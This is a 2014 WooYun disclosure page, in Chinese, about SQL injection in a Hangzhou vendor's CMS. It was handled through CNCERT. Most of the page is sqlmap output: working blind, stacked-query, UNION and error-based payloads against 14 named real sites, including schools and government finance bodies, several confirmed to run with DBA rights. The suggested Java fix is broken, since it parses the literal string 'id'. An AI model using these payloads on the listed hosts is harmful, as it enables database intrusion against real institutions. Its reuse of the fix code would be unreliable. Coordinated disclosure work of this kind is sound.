某软件公司程序存在通用型（DBA权限）SQL注入漏洞

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059967

漏洞标题：某软件公司程序存在通用型（DBA权限）SQL注入漏洞

漏洞作者：路人甲

提交时间：2014-05-09 18:08

修复时间：2014-08-07 18:10

公开时间：2014-08-07 18:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-09：细节已通知厂商并且等待厂商处理中
2014-05-12：厂商已经确认，细节仅向厂商公开
2014-05-15：细节向第三方安全合作伙伴开放
2014-07-06：细节向核心白帽子及相关领域专家公开
2014-07-16：细节向普通白帽子公开
2014-07-26：细节向实习白帽子公开
2014-08-07：细节向公众公开

简要描述：

乌云越来越给力了！预存了1万个通用List
感觉自己终于被得到认可，有同感的请点感谢！^ ^

详细说明：

技术支持：数域科技（杭州）有限公司
注入点:
1.index.aspx?pageGuid=
2.newsId=
存在问题的站点，（注意的是每个站点我只验证了一个，像pageGuid和newsId在多个页面出现的，你们修复要整站排查）。
手动排查波及10所学校+5个财政机构
1.http://www.hzdgxx.org/index.aspx?pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C
2.http://www.hzst.gov.cn/index.aspx?newsId=42993&CatalogID=934&PageGuid=4A3B6524-953E-4CA2-A5C4-0DC81BDEF4CC
3.http://hzchzx.cn/index.aspx?pageGuid=505698AB-366C-4C59-B789-F0D342E39758&CatalogID=189
4.http://www.hzbjzg.org/index.aspx?newsId=10520&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350
5.http://www.hzbwxx.com/index.aspx?newsId=10668&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7
6.http://hzgxsy.net/index.aspx?pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C&NewsID=11402
7.http://61.175.193.70:99/index.aspx?pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99
8.http://yuweishiny.13.dns222.net/index.aspx?pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5&ShopID=10
9.http://61.175.193.70:99/index.aspx?pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99
10.http://www.hzxxsy.com/index.aspx?pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C&NewsID=6765
11.http://220.191.210.97:8080/WebHall/NewsDatail.aspx?newsId=243
12.http://60.191.18.37:8088/WebHall/NewsDatail.aspx?newsId=3593
13.http://218.75.32.196:8020/WebHall/NewsDatail.aspx?newsId=3567
14.http://60.191.17.52/WebHall/NewsDatail.aspx?newsId=3624
预警：
1.http://das.hhtz.gov.cn/archive/index.aspx?pageguid=349219E1-28BB-4849-BE72-2F05EAD8D5B5&CatalogID=742
2.http://www.bjsqxy.org/index.aspx?pageguid=E2859CC5-DFBC-4066-876B-2E2BA585FDBB

漏洞证明：

1.http://www.hzdgxx.org/index.aspx?pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C

Place: GET
Parameter: pageGuid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C' AND 2824=2824 AND 'VseI'='VseI
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user is DBA:    True

2.http://www.hzst.gov.cn/index.aspx?newsId=42993&CatalogID=934&PageGuid=4A3B6524-953E-4CA2-A5C4-0DC81BDEF4CC

Place: GET
Parameter: newsId
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: newsId=(SELECT CHAR(113)+CHAR(122)+CHAR(116)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (3158=3158) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(109)+CHAR(119)+CHAR(113))&CatalogID=934&PageGuid=4A3B6524-953E-4CA2-A5C4-0DC81BDEF4CC
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user is DBA:    True

3.http://hzchzx.cn/index.aspx?pageGuid=505698AB-366C-4C59-B789-F0D342E39758&CatalogID=189

Place: GET
Parameter: pageGuid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pageGuid=505698AB-366C-4C59-B789-F0D342E39758' AND 7519=7519 AND 'znbd'='znbd&CatalogID=189
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: pageGuid=505698AB-366C-4C59-B789-F0D342E39758'; WAITFOR DELAY '0:0:5'--&CatalogID=189
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: pageGuid=505698AB-366C-4C59-B789-F0D342E39758' WAITFOR DELAY '0:0:5'--&CatalogID=189
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user is DBA:    True

4.http://www.hzbjzg.org/index.aspx?newsId=10520&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350

Place: GET
Parameter: newsId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsId=10520 AND 9164=9164&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: newsId=10520; WAITFOR DELAY '0:0:5'--&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: newsId=10520 WAITFOR DELAY '0:0:5'--&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

5.http://www.hzbwxx.com/index.aspx?newsId=10668&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7

Place: GET
Parameter: newsId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsId=10668 AND 2117=2117&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: newsId=10668 AND 1486=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(100)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (1486=1486) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(102)+CHAR(104)+CHAR(109)+CHAR(113)))&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: newsId=10668 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(100)+CHAR(98)+CHAR(113)+CHAR(106)+CHAR(108)+CHAR(76)+CHAR(82)+CHAR(112)+CHAR(69)+CHAR(78)+CHAR(73)+CHAR(72)+CHAR(80)+CHAR(113)+CHAR(102)+CHAR(104)+CHAR(109)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- &CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: newsId=(SELECT CHAR(113)+CHAR(120)+CHAR(100)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8905=8905) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(102)+CHAR(104)+CHAR(109)+CHAR(113))&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

6.http://hzgxsy.net/index.aspx?pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C&NewsID=11402

Place: GET
Parameter: pageguid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C' AND 2193=2193 AND 'KyWu'='KyWu&NewsID=11402
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C'; WAITFOR DELAY '0:0:5'--&NewsID=11402
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C' WAITFOR DELAY '0:0:5'--&NewsID=11402
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

7.http://61.175.193.70:99/index.aspx?pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99

Place: GET
Parameter: pageguid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99' AND 6773=6773 AND 'wbkn'='wbkn
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008

8.http://yuweishiny.13.dns222.net/index.aspx?pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5&ShopID=10

---
Place: GET
Parameter: pageguid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5' AND 9381=9381 AND 'Vysz'='Vysz&ShopID=10
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5'; WAITFOR DELAY '0:0:5'--&ShopID=10
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5' WAITFOR DELAY '0:0:5'--&ShopID=10
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 0
back-end DBMS: Microsoft SQL Server 2005

9.http://61.175.193.70:99/index.aspx?pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99

Place: GET
Parameter: pageguid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99' AND 6773=6773 AND 'wbkn'='wbkn
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008

10.http://www.hzxxsy.com/index.aspx?pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C&NewsID=6765

Place: GET
Parameter: pageguid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C' AND 8213=8213 AND 'jZpr'='jZpr&NewsID=6765
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C'; WAITFOR DELAY '0:0:5'--&NewsID=6765
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C' WAITFOR DELAY '0:0:5'--&NewsID=6765
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

11.http://220.191.210.97:8080/WebHall/NewsDatail.aspx?newsId=243

Place: GET
Parameter: newsId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsId=243 AND 9303=9303
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: newsId=-2691 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(104)+CHAR(103)+CHAR(112)+CHAR(102)+CHAR(71)+CHAR(114)+CHAR(79)+CHAR(106)+CHAR(115)+CHAR(65)+CHAR(113)+CHAR(116)+CHAR(121)+CHAR(121)+CHAR(113)-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: newsId=243; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: newsId=243 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

12.http://60.191.18.37:8088/WebHall/NewsDatail.aspx?newsId=3593

Place: GET
Parameter: newsId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsId=3593 AND 4569=4569
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: newsId=-4271 UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(110)+CHAR(98)+CHAR(113)+CHAR(101)+CHAR(69)+CHAR(107)+CHAR(113)+CHAR(74)+CHAR(118)+CHAR(98)+CHAR(78)+CHAR(71)+CHAR(113)+CHAR(113)+CHAR(119)+CHAR(105)+CHAR(119)+CHAR(113),NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: newsId=3593; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: newsId=3593 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

13.http://218.75.32.196:8020/WebHall/NewsDatail.aspx?newsId=3567

Place: GET
Parameter: newsId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsId=3567 AND 8900=8900
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: newsId=-6027 UNION ALL SELECT NULL,CHAR(113)+CHAR(119)+CHAR(106)+CHAR(97)+CHAR(113)+CHAR(66)+CHAR(111)+CHAR(97)+CHAR(115)+CHAR(111)+CHAR(114)+CHAR(67)+CHAR(77)+CHAR(83)+CHAR(89)+CHAR(113)+CHAR(114)+CHAR(107)+CHAR(116)+CHAR(113)-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: newsId=3567; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: newsId=3567 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

14.http://60.191.17.52/WebHall/NewsDatail.aspx?newsId=3624

Place: GET
Parameter: newsId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsId=3624 AND 8066=8066
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: newsId=-3498 UNION ALL SELECT NULL,CHAR(113)+CHAR(100)+CHAR(97)+CHAR(109)+CHAR(113)+CHAR(97)+CHAR(77)+CHAR(114)+CHAR(80)+CHAR(90)+CHAR(111)+CHAR(75)+CHAR(70)+CHAR(105)+CHAR(87)+CHAR(113)+CHAR(113)+CHAR(110)+CHAR(112)+CHAR(113)-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: newsId=3624; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: newsId=3624 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

修复方案：

数字型参数newsId
修复方案为：在接收参数newsId时，对其进行强制整型转换即可。
以id参数为例，
int id= Integer.parseInt("id") ;//对id整型转换后再进行下一步的数据库查询更安全
字符型参数pageGuid
修复方案为：在接收参数pageGuid时，对其进行白名单限制。
例如，我先定pageGuid值只为我们设定的数组中的几个值,这个数组就是我们设定的白名单。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：14

确认时间：2014-05-12 18:50

厂商回复：

CNVD确认并复现所述情况，由CNVD通过公开联系渠道向软件生产厂商数域科技（杭州）有限公司处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059967

漏洞标题：某软件公司程序存在通用型（DBA权限）SQL注入漏洞

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2014-05-09 18:08

修复时间：2014-08-07 18:10

公开时间：2014-08-07 18:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059967

漏洞标题：某软件公司程序存在通用型（DBA权限）SQL注入漏洞

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2014-05-09 18:08

修复时间：2014-08-07 18:10

公开时间：2014-08-07 18:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-059967"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云